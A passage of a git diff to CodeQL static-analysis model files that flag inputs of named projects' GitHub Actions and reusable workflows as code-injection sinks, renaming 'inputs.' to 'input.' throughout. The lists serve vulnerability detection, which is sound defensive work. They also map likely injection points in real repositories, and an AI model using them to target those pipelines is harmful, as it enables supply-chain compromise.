@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index e95dacb65a92..9569d47329fb 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml 
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"]
- - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"]
- - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"]
- - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"]
\ No newline at end of file
+ - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"]
+ - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"]
+ - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"]
+ - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml
index 42a9859aa230..6cf5dd84fbd7 100644
--- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml
+++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml
index 029e4f95a2a4..ce09307f8fb4 100644
--- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml
+++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"]
- - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"]
+ - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml
index 3223e185c7b3..183319e32ff8 100644
--- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml
+++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"]
\ No newline at end of file
+ - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml
index 26fa1ce22b79..d8fb3f98b094 100644
--- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml
+++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"]
- - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"]
\ No newline at end of file
+ - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.path", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.cluster-location", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.cluster-name", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.gcp-project-id", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.package", "code-injection", "generated"]
+ - ["toeverything/affine", "*", "input.target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml
index a68a3372089a..c0c663e69f38 100644
--- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml
+++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"]
- - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"]
- - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"]
\ No newline at end of file
+ - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"]
+ - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"]
+ - ["treeverse/lakefs", "*", "input.compose-file", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml
index 6c874d646558..35c0d80a115b 100644
--- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml
+++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"]
- - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"]
- - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"]
- - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"]
\ No newline at end of file
+ - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"]
+ - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"]
+ - ["trezor/trezor-firmware", "*", "input.status", "code-injection", "generated"]
+ - ["trezor/trezor-firmware", "*", "input.full-deps", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml
index 8d339364cf3d..dc1dcff0b152 100644
--- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml
+++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"]
- - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"]
- - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"]
- - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"]
- - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"]
\ No newline at end of file
+ - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"]
+ - ["tribler/tribler", "*", "input.command", "code-injection", "generated"]
+ - ["tribler/tribler", "*", "input.duration", "code-injection", "generated"]
+ - ["tribler/tribler", "*", "input.requirements", "code-injection", "generated"]
+ - ["tribler/tribler", "*", "input.path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml
index db6751f8ef5b..2da63c894fc4 100644
--- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml
+++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"]
- - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"]
\ No newline at end of file
+ - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.setup-deps", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.label", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.debug", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.check-run-id", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.check-all-mode", "code-injection", "generated"]
+ - ["trunk-io/trunk-action", "*", "input.cache-key", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml
index 68959bf21024..3dc87b3ed761 100644
--- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"]
\ No newline at end of file
+ - ["unidata/metpy", "*", "input.key", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml
index f8aa8480088b..94a140a9fe17 100644
--- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml
+++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml
index 0f78fddcd969..d8f782746230 100644
--- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml
+++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"]
\ No newline at end of file
+ - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml
index 9eb860b13d91..f539135bba01 100644
--- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml
+++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"]
- - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"]
\ No newline at end of file
+ - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.key-secret", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.key-id", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.endpoint", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.asset-path", "code-injection", "generated"]
+ - ["vesoft-inc/nebula", "*", "input.tag", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml
index 573b256121f9..cc8a7f16492d 100644
--- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml
+++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"]
- - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"]
- - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"]
- - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"]
- - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"]
- - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"]
\ No newline at end of file
+ - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"]
+ - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"]
+ - ["vkcom/vkui", "*", "input.npm_tag", "code-injection", "generated"]
+ - ["vkcom/vkui", "*", "input.prev_version", "code-injection", "generated"]
+ - ["vkcom/vkui", "*", "input.new_version", "code-injection", "generated"]
+ - ["vkcom/vkui", "*", "input.pre_id", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml
index c5278340c0b1..ec1ed14fed50 100644
--- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml
+++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"]
- - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"]
- - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"]
- - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"]
\ No newline at end of file
+ - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"]
+ - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"]
+ - ["vuetifyjs/vuetify", "*", "input.npm-tag", "code-injection", "generated"]
+ - ["vuetifyjs/vuetify", "*", "input.release-id", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml
index b11973cfa008..18b37d3c658b 100644
--- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml
+++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
+ - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml
index 1fd3ca1f0050..c1699ec6816f 100644
--- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml
+++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"]
- - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"]
\ No newline at end of file
+ - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.relay-endpoint", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-host", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-secret", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.gm-dapp-project-id", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.explorer-endpoint", "code-injection", "generated"]
+ - ["walletconnect/walletconnectswiftv2", "*", "input.notify-endpoint", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml
index 727a21ac9602..0fe9b73b6deb 100644
--- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml
+++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"]
- - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"]
- - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"]
\ No newline at end of file
+ - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"]
+ - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"]
+ - ["wazuh/wazuh", "*", "input.path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml
index fff6557dd410..27a5defa298f 100644
--- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml
+++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"]
- - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"]
- - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"]
\ No newline at end of file
+ - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"]
+ - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"]
+ - ["web-infra-dev/rspack", "*", "input.target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml
index e87c7cf5c06b..05fd2667812b 100644
--- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml
+++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"]
\ No newline at end of file
+ - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml
index 9c556053d664..5a91e3cd32f1 100644
--- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml
+++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"]
\ No newline at end of file
+ - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml
index 6121c00ccfd3..bb632423a1c5 100644
--- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml
+++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"]
- - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"]
- - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"]
\ No newline at end of file
+ - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"]
+ - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"]
+ - ["xrplf/rippled", "*", "input.cmake-args", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml
index 789bdb53aed2..dca76acdc27d 100644
--- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml
+++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"]
- - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"]
\ No newline at end of file
+ - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"]
+ - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml
index 58389ad753e6..c0e357715de3 100644
--- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml
+++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"]
\ No newline at end of file
+ - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
index 853948c5ec33..2bc23972e785 100644
--- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
+++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"]
- - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"]
\ No newline at end of file
+ - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"]
+ - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
index 2e8a6683a576..740bfd26d695 100644
--- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"]
\ No newline at end of file
+ - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
index 55533f123127..f3bfa556ee5d 100644
--- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"]
- - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"]
- - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"]
- - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"]
\ No newline at end of file
+ - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"]
+ - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"]
+ - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "input.message", "code-injection", "generated"]
+ - ["8vim/8vim/.github/workflows/build.yaml", "*", "input.target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
index a14d41a15b9c..f8c4e3c68beb 100644
--- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"]
- - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"]
- - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"]
- - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"]
- - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"]
- - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"]
\ No newline at end of file
+ - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"]
+ - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"]
+ - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.reference-files", "code-injection", "generated"]
+ - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.target-folder", "code-injection", "generated"]
+ - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "input.build-command", "code-injection", "generated"]
+ - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "input.dist-path", "code-injection", "generated"]
